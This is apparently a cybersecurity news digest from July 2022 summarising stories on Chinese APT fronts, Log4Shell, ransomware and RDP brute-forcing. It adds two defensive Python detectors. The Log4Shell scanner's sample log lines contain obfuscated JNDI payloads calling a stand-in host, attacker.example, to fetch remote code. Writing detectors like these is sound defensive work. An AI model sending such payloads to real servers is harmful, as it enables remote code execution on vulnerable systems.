Saturday, July 02, 2022 // (IG): BB // Weekly Sponsor: Zanes Hand Made (leather works)
Chinese hackers kept up hiring drive despite FBI indictment
FROM THE MEDIA: Hackers with suspected links to China’s intelligence agencies were still advertising for new recruits to work on cyber espionage, even after the FBI indicted the perpetrators in an effort to disrupt their activities.
Hainan Tengyuan, a Chinese technology company, was actively recruiting English language translators in March according to job adverts seen by the Financial Times — nine months after US law enforcement agencies accused Beijing of setting up such companies as a “front” for spying operations against western targets.
Hainan Tengyuan is also part of a wider network of companies that has links, including common contact details and employees, with another tech firm, Hainan Xiandun, which was exposed by the FBI in a 2021 indictment as a cover for the Chinese hacking group APT40.
READ THE STORY: FT
How Russian cyber army suppressed US F-35 Stealth Fighters by electronic warfare
ANALYST NOTE: With all the negative publicity due to ineffectiveness in the Ukrainian conflict, could this release be propaganda? Traditionally EW is not a function of “cyber”, but the Russian government absolutely has skilled APTs and organized crime elements. Could they manipulate air defense via “cyber”? Probably, but this article has some holes.
FROM THE MEDIA: While it certainly is true that Russian EW systems like the Krasukha-4 have been highly effective in jamming even US drones, Russia’s interference in Israeli military exercises within its territory seems highly unlikely.
The only situation where Russia would interfere in Israeli air operations is in Syria, where they have a deconfliction mechanism to allow IAF to strike Iranian targets. They also helped shoot down Israeli AGMs with the Buk-M2/3 supplied to the Syrian Arab Army (SAA) a few months ago.
But Russia would softly retaliate by electronically interfering in Israeli air operations only around its interests in Ukraine or Syria. The AviaPro report might be valid to the extent that GPS signal disruption has been observed in the Eastern Mediterranean since Russia specifically installed anti-drone and EW systems at its Khmeimim air base in Syria to protect it from air and space surveillance.
Russian electronic jammers can disrupt signals from the GLONASS, American GPS, European Galileo, and Chinese BeiDou satellite navigation systems. Thus aircraft, drones, or missiles will see their GPS receivers go awry.
READ THE STORY: The Kashmir Monitor
Threat Actor Claims Responsibility For IBM and Stanford University Hack
FROM THE MEDIA: CloudSEK used its artificial intelligence (AI)-powered digital risk platform XVigil to identify a post on a cybercrime forum mentioning open source automation server platform Jenkins as one of the TTP (tactics, techniques, and procedures) used by a threat actor (TA) in attacks against IBM and Stanford University.
The module reportedly has hidden desktop takeover capabilities that would be used by the TA to get clicks on ads.
The post on the English-speaking forum was spotted by CloudSEK on May 07 2022 and contained a sample screenshot as proof of their claimed access to a Jenkins dashboard. From a technical standpoint, the TA encountered a Jenkins dashboard bypass that contained internal hosts and scripts, together with database credentials and logins.
READ THE STORY: InfoSec Mag
FBI Warns That Scammers Are Using Deepfakes to Apply for Sensitive Jobs
FROM THE MEDIA: On June 28, 2022, the FBI issued a Public Service Announcement (PSA) warning that fraudsters are using deepfakes to impersonate job applicants during online interviews and employing stolen Personally Identifiable Information (PII) to apply for positions. (Deepfakes are realistic synthetic media that are either altered or wholly created by artificial intelligence.)
This type of fraud may be used in an effort to gain access to company networks and to otherwise obtain company data. According to the FBI, the jobs targeted by scammers include remote work or work-from-home jobs in the information technology, computer programming, database, and software fields. “Notably,” the PSA from the FBI’s Internet Crime Complaint Center said, “some reported positions include access to customer PII, financial data, corporate IT databases and/or proprietary information.” This is a particularly concerning development, given the potential business and legal ramifications to businesses of unauthorized access to PII, under a mosaic of state laws and international protocols.
READ THE STORY: WilmerHale
Employment and Labor Websites Across the US Are Offline Due to Cyberattack — How Many States are Affected?
FROM THE MEDIA: People are being cut off from services like unemployment benefits and job-seeking programs as a result of a cyberattack on software company Geographic Solutions (GSI) that began almost a week ago, The Register reported.
The Louisiana Workforce Commission said in a statement this week that GSI had to shut down state labor exchanges and unemployment claims systems, potentially having an impact on up to 40 states and Washington, DC. GSI provides services to these states.
According to the company's LinkedIn page, GSI provides online services for state and local governments in more than 35 states and creates software for things like workforce development, labor market data, and unemployment insurance. The vendor also maintains websites for government organizations in states including Indiana, Florida, North Carolina, and California.
READ THE STORY: itechpost // The Register
Zoho ManageEngine ADAudit Plus bug gets public RCE exploit
FROM THE MEDIA: Security researchers have published technical details and proof-of-concept exploit code for CVE-2022-28219, a critical vulnerability in the Zoho ManageEngine ADAudit Plus tool for monitoring activities in the Active Directory.
The vulnerability allows an unauthenticated attacker to execute code remotely and compromise Active Directory accounts. It comes with a critical severity score of 9.8 out of 10. Zoho addressed the issue at the end of March in ADAudit Plus build 7060 after security researcher Naveen Sunkavally at Horizon3.ai reported it to the company.
READ THE STORY: BleepingComputer
CISA and Coast Guard Cyber Command Warn About Hackers Leveraging Log4Shell Vulnerability on VMware Servers
FROM THE MEDIA: The Cybersecurity and Infrastructure Security Agency (CISA) and the US Coast Guard Cyber Command (CGCYBER) released a joint advisory, warning that multiple threat actors, including state-sponsored and ransomware groups, are still targeting unpatched Log4Shell vulnerabilities in VMware servers.
The advisory stated that advanced persistent threat (APT) actors exploited the Log4Shell remote code execution vulnerability CVE-2021-44228 in VMware Horizon and Unified Access Gateway (UAG) to move laterally across the network, escalate privileges, deploy malware, and exfiltrate sensitive data. Both Internet-facing and internal VMware Horizon and UAG servers were affected.
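As an added example, not from the CISA/CGCYBER advisory or the CPO Magazine article, the following Python scans web-server or reverse-proxy access-log lines for the Log4Shell (CVE-2021-44228) JNDI lookup string. A plain substring search for `${jndi:` misses the nested-lookup and percent-encoded variants that have been widely documented, so the scanner first collapses `${lower:…}`, `${upper:…}` and `${…:-x}` default-value lookups and URL decoding, checking after every pass. The log lines, the host name `attacker.example` and the function names are constructed for this example.

```python
"""Added example (not from the advisory or the article): detect Log4Shell
JNDI lookup strings in access-log lines, including common obfuscated forms.

Assumptions (constructed for this example): lines are plain text in the
Combined Log Format as a reverse proxy in front of Horizon/UAG would write;
the sample lines and the host 'attacker.example' are made up.
"""
import re
from urllib.parse import unquote

# Lookups that evaluate to a literal string and are used to hide "jndi":
#   ${lower:J} -> j   ${upper:n} -> N   ${::-j} -> j   ${env:MISSING:-j} -> j
_SIMPLE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")
# The thing we actually want to see once the layers are peeled off.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

# Constructed sample log lines: two benign, three probes of increasing
# obfuscation.  Index 4 is benign noise that merely contains "${".
SAMPLE_LINES = [
    '198.51.100.5 - - [02/Jul/2022:10:00:01 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [02/Jul/2022:10:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://attacker.example/a}"',
    '203.0.113.9 - - [02/Jul/2022:10:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${lower:j}${upper:n}di:${::-l}dap://attacker.example/a}"',
    '203.0.113.9 - - [02/Jul/2022:10:00:04 +0000] "GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3A'
    'ldap%3A%2F%2Fattacker.example%2Fa%7D HTTP/1.1" 200 512 "-" "curl/7.68.0"',
    '198.51.100.6 - - [02/Jul/2022:10:00:05 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Monitor/1.0 (${foo})"',
]


def _fold_case(m):
    """Replace ${lower:X} / ${upper:X} with the literal it evaluates to."""
    return m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper()


def normalize(text, max_rounds=10):
    """Peel off one layer per round: percent-encoding, case lookups, defaults."""
    for _ in range(max_rounds):
        prev = text
        text = unquote(text)
        text = _SIMPLE_LOOKUP.sub(_fold_case, text)
        text = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), text)
        if text == prev:          # nothing left to collapse
            break
    return text


def is_log4shell_probe(line, max_rounds=10):
    """True if the line contains ${jndi: directly or after de-obfuscation.

    The check runs after every single pass so that a later substitution
    cannot mangle an already-visible ${jndi: before we see it."""
    for _ in range(max_rounds + 1):
        if _JNDI.search(line):
            return True
        nxt = normalize(line, max_rounds=1)
        if nxt == line:
            return False
        line = nxt
    return False


def scan_for_log4shell(lines):
    """Return the indexes of lines that look like Log4Shell probes."""
    return [i for i, line in enumerate(lines) if is_log4shell_probe(line)]


if __name__ == "__main__":
    for i in scan_for_log4shell(SAMPLE_LINES):
        print(f"line {i}: {normalize(SAMPLE_LINES[i])}")
```

Only the request-line and User-Agent fields are shown in the sample, but the same check applies to any header the application logs, since Log4j evaluated lookups in whatever string reached the logger. Patching remains the fix; this only tells you who has been knocking.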
READ THE STORY: CPO MAG
DragonForce Malaysia Releases LPE Exploit, Threatens Ransomware
FROM THE MEDIA: The hacktivist group DragonForce Malaysia has released an exploit that allows Windows Server local privilege escalation (LPE) to grant access to local distribution router (LDR) capabilities. It also announced that it's adding ransomware attacks to its arsenal.
The group posted a proof of concept (PoC) of the exploit on its Telegram channel on June 23, which was subsequently analyzed by CloudSEK this week. While there's no known CVE for the bug, the group claims that the exploit can be used to bypass authentication "remotely in one second" in order to access the LDR layer, which is used to interconnect local networks at various locations of an organization.
READ THE STORY: DarkReading
Google location tracking to forget you were ever at that medical clinic
ANALYST NOTE: The auto-deletion is great, but there is always a chance that the data gets stored via a third party or through some loophole that is found later. Historically Google has released such data to LEOs for prosecution; for example: (New York Times // Wired // Forbes)
FROM THE MEDIA: Google on Friday pledged to update its location history system so that visits to medical clinics and similarly sensitive places are automatically deleted. In this post-Roe era of America, there is concern that cops and other law enforcement will demand the web giant hand over information about its users if they are suspected of breaking the law by seeking an abortion.
Google keeps a log of its users' whereabouts via its Location History functionality, and provides some controls to delete all or part of those records, or switch it off. Now, seemingly in response to the above concerns and a certain US Supreme Court decision, we're told Google's going to auto-delete some entries. "If our systems identify that someone has visited one of these places, we will delete these entries from Location History soon after they visit," said senior veep Jen Fitzpatrick. "This change will take effect in the coming weeks."
READ THE STORY: The Register
BLACK BASTA Ransomware Actors Take Aim at PRINTNIGHTMARE Flaw
FROM THE MEDIA: The Black Basta ransomware operators have been observed exploiting the Microsoft PrintNightmare vulnerability after gaining initial access in a recent attack in order to perform privileged file operations.
Black Basta has tallied up a total of 50 victims as of June 24 since its operations started in April. The ransomware has targeted a wide range of industries in the U.S., Canada, the UK and Australia, including manufacturing, transportation, telecommunications and pharmaceuticals. The ransomware, which also has a Linux variant that has targeted VMware ESXi virtual machines, is known for double-extortion attacks, where data is first exfiltrated before the ransomware is deployed.
READ THE STORY: DUO
Federal authorities warn MedusaLocker ransomware targeting remote desktop vulnerabilities
FROM THE MEDIA: Researchers from Huntress have seen an increase during the last quarter in threat actors targeting RDP as an initial access point.
“If an organization has RDP, threat actors will brute force with endless username and password combinations until they succeed in gaining authenticated access,” Dray Agha, ThreatOps analyst at Huntress, said via email.
After gaining access to a network, hackers will use RDP to move laterally, free to move about without being monitored.
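The pattern Huntress describes, a stream of failed RDP logons from one source until one succeeds, is visible in the Windows Security log if anyone looks. As an added example, not from the Cybersecurity Dive article or from Huntress, the following Python groups Event ID 4625 (failed logon) and 4624 (successful logon) records with LogonType 10 (RemoteInteractive, i.e. RDP) by source address and flags a source whose failures reach a threshold inside a sliding window, reporting whether it then logged on and as whom. The event dictionaries stand in for fields a SIEM would already have extracted; the sample events, addresses and user names are constructed.

```python
"""Added example (not from the article or Huntress): flag RDP brute-force
activity in Windows Security events and tell whether it ended in a logon.

Assumptions (constructed for this example): each event is a dict with the
fields a SIEM extracts from Event IDs 4625/4624 -- 'ts' (ISO timestamp),
'id' (event id), 'type' (LogonType; 10 = RemoteInteractive/RDP),
'src' (source address) and 'user' (target account).
"""
from collections import defaultdict
from datetime import datetime, timedelta

FAIL_THRESHOLD = 5              # failures from one source inside WINDOW
WINDOW = timedelta(minutes=5)

# Constructed sample: one source sprays five names in 15 seconds and gets in
# as 'jsmith'; one user mistypes a password once; one non-RDP failure (SMB,
# LogonType 3) from the noisy source is present but must be ignored.
SAMPLE_EVENTS = [
    {"ts": "2022-07-02T03:00:01", "id": 4625, "type": 10, "src": "203.0.113.7", "user": "admin"},
    {"ts": "2022-07-02T03:00:02", "id": 4625, "type": 3,  "src": "203.0.113.7", "user": "admin"},
    {"ts": "2022-07-02T03:00:03", "id": 4625, "type": 10, "src": "203.0.113.7", "user": "administrator"},
    {"ts": "2022-07-02T03:00:05", "id": 4625, "type": 10, "src": "203.0.113.7", "user": "backup"},
    {"ts": "2022-07-02T03:00:08", "id": 4625, "type": 10, "src": "203.0.113.7", "user": "svc_rdp"},
    {"ts": "2022-07-02T03:00:11", "id": 4625, "type": 10, "src": "203.0.113.7", "user": "jsmith"},
    {"ts": "2022-07-02T03:00:15", "id": 4625, "type": 10, "src": "203.0.113.7", "user": "jsmith"},
    {"ts": "2022-07-02T03:00:20", "id": 4624, "type": 10, "src": "203.0.113.7", "user": "jsmith"},
    {"ts": "2022-07-02T08:15:00", "id": 4625, "type": 10, "src": "198.51.100.22", "user": "mlee"},
    {"ts": "2022-07-02T08:15:30", "id": 4624, "type": 10, "src": "198.51.100.22", "user": "mlee"},
]


def _ts(event):
    return datetime.fromisoformat(event["ts"])


def _burst_within(times, threshold, window):
    """True if any `window`-long span of the sorted timestamps holds >= threshold."""
    j = 0
    for i in range(len(times)):
        while j < len(times) and times[j] - times[i] <= window:
            j += 1
        if j - i >= threshold:
            return True
    return False


def find_rdp_bruteforce(events, threshold=FAIL_THRESHOLD, window=WINDOW):
    """Return {src: {'failures', 'usernames', 'success_as'}} for sources that
    produced a burst of RDP logon failures; 'success_as' is the account of the
    first RDP logon success after the last failure, or None."""
    by_src = defaultdict(list)
    for e in sorted((e for e in events if e["type"] == 10), key=_ts):
        by_src[e["src"]].append(e)

    alerts = {}
    for src, evs in by_src.items():
        fails = [e for e in evs if e["id"] == 4625]
        if not fails or not _burst_within([_ts(e) for e in fails], threshold, window):
            continue
        last_fail = _ts(fails[-1])
        success = next((e["user"] for e in evs
                        if e["id"] == 4624 and _ts(e) >= last_fail), None)
        alerts[src] = {
            "failures": len(fails),
            "usernames": sorted({e["user"] for e in fails}),
            "success_as": success,
        }
    return alerts


if __name__ == "__main__":
    for src, info in find_rdp_bruteforce(SAMPLE_EVENTS).items():
        print(src, info)
```

A source that both trips the threshold and then has `success_as` set is the case the quote warns about: the guessing worked, and the next thing to look for is lateral RDP (more LogonType 10 events) from that first host. Tune the threshold and window to the host's normal failure rate; the point is the shape of the activity, not the exact numbers.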
READ THE STORY: Cybersecurity Dive
Publishing giant Macmillan still unable to process orders after ransomware attack
FROM THE MEDIA: Publishing giant Macmillan is in the process of recovering from a ransomware attack that has left it unable to process orders electronically.
No ransomware group has come forward to claim the attack, but employees of the company initially took to Twitter to discuss the incident. Publishers Weekly was the first to report that the company was emailing customers and employees about closing its offices on Monday and Tuesday due to the attack.
READ THE STORY: The Record
Moody’s says Costa Rican response shows ‘resilience’ of sovereign governments to ransomware
FROM THE MEDIA: A pair of ransomware attacks targeting the Costa Rican government in April and May crippled computer networks and brought essential services to a standstill, but a prominent U.S. credit ratings firm is saying the episodes actually demonstrate some of the inherent resilience of sovereign governments against such hacks.
The attacks — one carried out by Conti and another by Hive — did result in significant disruption to nearly a quarter of the Costa Rican economy, with impacts on healthcare, international trade and revenue collection. The Conti infection disabled online services offered by the Ministry of Finance, while the Hive attack a month later hit the Ministry of Social Security.
READ THE STORY: SCMAG
DOJ sets new goals for responding to ransomware attacks
FROM THE MEDIA: The Justice Department said it wants to increase the percentage of reported ransomware incidents it handles to 65% by September 2023. In a strategic planning document published Friday, the Department of Justice said that by September 30, 2023, it pledges to increase “the percentage of reported ransomware incidents from which cases are opened, added to existing cases, or resolved or investigative actions are conducted within 72 hours to 65%.”
The department also wants to increase “the number of ransomware matters in which seizures or forfeitures are occurring by 10%.” The pledges were also included in the President’s Management Agenda website and were under the purview of Eun Young Choi, the recently appointed director of the National Cryptocurrency Enforcement Team at the Justice Department.
READ THE STORY: The Record
Cyberattacks on the rise in ag industry
FROM THE MEDIA: The reliance on technology to keep businesses and people going has continued to increase. That dependence has opened up possible threats to agriculture. In recent years it isn’t uncommon to hear of a cyberattack shutting down a cooperative, and other areas of the industry are vulnerable.
“There is an increasing proliferation of precision agriculture,” said Lewis Balfour, an intelligence analyst with the Federal Bureau of Investigation in Springfield, Illinois. “Now, more than ever, we have an increased use of advanced technologies like GPS and drones to increase yields. That makes the agricultural sector a more lucrative and vulnerable target for cyber threat actors.”
READ THE STORY: AG Update
What Is Leakware? Here's What You Need to Know
FROM THE MEDIA: Leakware is a subset of ransomware, which is a kind of malware used to threaten victims with their own data. In the case of a leakware attack, data is stolen by a malicious party and encrypted. This makes the data indecipherable and therefore unusable. But this encryption isn't permanent. The attacker will encrypt the data while holding the decryption key, which the victim will only be given if they meet the attacker's demands.
READ THE STORY: MUO
State Department offers up to $10 million for info on foreign election interference
FROM THE MEDIA: The State Department announced on Thursday that it is offering up to $10 million for tips about foreign interference in U.S. elections, including illegal cyber activities.
The cash, offered through the department’s Rewards for Justice program, would be for any information that leads to the identification or location of any foreign person or entity “who knowingly engaged or is engaging in foreign election interference.”
READ THE STORY: The Record
Chinese internet trolls deployed to protect rare earths stranglehold
FROM THE MEDIA: For the unsuspecting Facebook user in Texas, posts, along with the emergence of new groups on their feeds highlighting threats posed by a new rare earths separation plant, may appear legitimate.
Seemingly published by Texans, they flooded the social media platform after Australian rare earth miner, Lynas Resources (ASX: LYC), won a major U.S. Government grant to build a facility in Texas that will process rare earths from a massive mine in the west of Australia.
“My friends and I have been resisting the construction of a rare earth processing plant in Texas by Lynas. If nothing is done Lynas’ waste discharge will directly or indirectly affect the health of local residents, and this pollution is irreversible,” one Facebook post said.
READ THE STORY: Asia Markets
TikTok: Yes, some staff in China can access US data
FROM THE MEDIA: TikTok, owned by Chinese outfit ByteDance, last month said it was making an effort to minimize the amount of data from US users that gets transferred outside of America, following reports that company engineers in the Middle Kingdom had access to US customer data.
"100 percent of US user traffic is being routed to Oracle Cloud Infrastructure," TikTok said in a June 17, 2022 post, while acknowledging that customer information still got backed up to its data center in Singapore. The biz promised to delete US users' private data from its own servers and to "fully pivot to Oracle cloud servers located in the US."
READ THE STORY: The Register
Play Store still hosts malware. What’s lacking?
FROM THE MEDIA: Android’s hallmark has always been ‘openness’—the platform’s huge scale is in fact one of its core strengths. Its size, however, makes the Play Store a diverse morass for Google to guard. Yet, despite fortifying its scanning defenses for years, malicious apps still beat Play Store’s security, threatening millions of users.
Software company Dr.Web discovered apps with built-in adware and information-stealing malware on the Google Play Store two months ago. In a report, the researchers highlighted that at least five apps are still available in the app store and had amassed over two million downloads. Other apps allegedly containing malicious code have been removed from the Play Store, according to Dr.Web.
READ THE STORY: Tech HQ
Info of over 300,000 Israelis leaked as Iranian hackers target travel booking sites
FROM THE MEDIA: Iranian hackers have recently hacked into a number of popular Israeli travel booking websites, managing to obtain the personal information of over 300,000 Israelis. The incident occurred two weeks ago and was confirmed by Israel’s Privacy Protection Authority on Thursday evening.
The attack affected websites operated by Gol Tours LTD, a tourist company that owns over 20 travel booking websites. The leaked information includes telephone numbers, addresses, dates and locations of booked vacations, and sensitive medical information, the authority said in a statement.
READ THE STORY: The Times of Israel
New 'SessionManager' Backdoor Targeting Microsoft Exchange Servers Worldwide
FROM THE MEDIA: Kaspersky security experts have discovered new malware targeting Microsoft Exchange servers belonging to several organizations worldwide.
Dubbed “SessionManager” and first spotted by the company in early 2022, the backdoor enables threat actors to keep “persistent, update-resistant and rather stealth access to the IT infrastructure of a targeted organization.”
READ THE STORY: InfoSec Mag
NYDFS Imposes Fine of $5 Million on Carnival for Cybersecurity Breaches
FROM THE MEDIA: On June 24, 2022, the New York State Department of Financial Services (“NYDFS” or the “Department”) announced it had entered into a $5 million settlement with Carnival Corp. (“Carnival”), the world’s largest cruise-ship operator, for violations of the Cybersecurity Regulation (23 NYCRR Part 500) in connection with four cybersecurity events between 2019 and 2021, including two ransomware events.
READ THE STORY: National Law Review
Microsoft Spots Updated Cryptomining Malware Tool Targeting Linux Systems
FROM THE MEDIA: Microsoft’s Security Intelligence team has issued a new warning against a known cloud threat actor (TA) group. Tracked as 8220 and active since early 2017, the group has now reportedly updated its malware toolset to breach Linux servers in order to install crypto miners as part of a long-running campaign. “The updates include the deployment of new versions of a cryptominer and an IRC bot, as well the use of an exploit for a recently disclosed vulnerability,” the technology giant wrote in a Twitter thread on Thursday.
READ THE STORY: InfoSec Mag
Flagstar Bank breach another example of hacker threat to financial sector
FROM THE MEDIA: Cybersecurity risks to financial institutions, such as banks and financial services, have grown in recent years despite the industry being heavily regulated to protect customers' data. Flagstar Bank, which operates 150 branches and is one of the largest mortgage servicers in the U.S., acknowledged on June 17 it suffered a data breach after hackers gained access to customers' personal information. The cyberattack on Flagstar Bank is not alone as financial institutions have become leading targets for cyber criminals. According to Check Point, there were 703 reported cyberattack attempts per week in 2021 within the industry, which was a 53% increase from 2020.
READ THE STORY: SCMAG
Moscow Uses Hacker Gangs to Carry Out Cyberattacks
FROM THE MEDIA: Russia relies on hacker gangs to launch disruptive attacks against Western infrastructure, the Organized Crime and Corruption Reporting Project (OCCRP), an international investigative journalism organization specializing in organized crime, indicated on June 3.
“Russia makes agreements with different Russian cybercriminal groups […], in exchange for leniency on certain crimes, if they help it orchestrate disruptive campaigns and cause economic damage against U.S. and European organizations,” Víctor Ruíz, founder of the SILIKN cybersecurity center in Mexico, told Diálogo.
“Cybercriminal groups help the Kremlin to have a greater reach. In case they are detected or identified Moscow can disassociate from them,” Ruíz added. “These groups are not only made up of Russian nationals but [of people] from other parts of the world. In addition, they recruit disgruntled employees to give them access to the systems of the organizations to be attacked.”
READ THE STORY: Diálogo Americas
Items of interest
Key Lawmaker: Digital Passport Only Way to Deter Crypto Use for Ransomware Attacks
FROM THE MEDIA: During a hearing that highlighted the dual-sided implications technology often creates for privacy and security, Rep. Bill Foster, D-Ill., promoted the idea of regulating cryptocurrency exchanges by implementing a digital passport, saying it’s the only way to make the industry less attractive to perpetrators of ransomware attacks and other transnational crime.
“You're ultimately going to need to have a uniquely identified, biometrically de-duped crypto driver's license, as it were, if you're really going to prevent it from being used for ransomware and all this sort of thing,” Foster said. “That's going to involve setting up very much like I guess a passport system,” he said, noting, “one of the tough things that we're going to face as a government is sharing data with other governments.”
Foster is chair of the House Science Committee’s panel on investigations and oversight. His comments during a hearing the subcommittee held Wednesday on “privacy in the age of biometrics,” come as some of his fellow Democrats in the House and Senate push federal agencies to stop doing business with facial-recognition firm Clearview AI and generally spurn the technology.
READ THE STORY: Nextgov
What an Identity Theft Victim Can Teach Us About Cybercrime (Video)
FROM THE MEDIA: Every year millions become victims of identity theft and many other cyber-attacks, including ransomware, phishing, scams, and more. Sandra Estok reveals a fresh, inspiring, and empowering way to relate to technology. Sharing her nightmare story and becoming a cybersecurity expert, she teaches us about cybercrime, Cybermonsters, and so much more.
The Role of Cryptocurrency in Cybercrime Panel (Video)
FROM THE MEDIA: Learn about innovations in the use of cryptocurrency by cybercriminals, the challenges that presents to regulators and law enforcement, the consequences for business, and how to find a path forward.
About this Product
These open source products are reviewed from analysts at InfoDom Securities and provide possible context about current media trends in regard to the realm of cyber security. The stories selected cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not specifically endorse any third-party claims made in their original material or related links on their sites, and the opinions expressed by third parties are theirs alone. Contact InfoDom Securities at dominanceinformation@gmail.com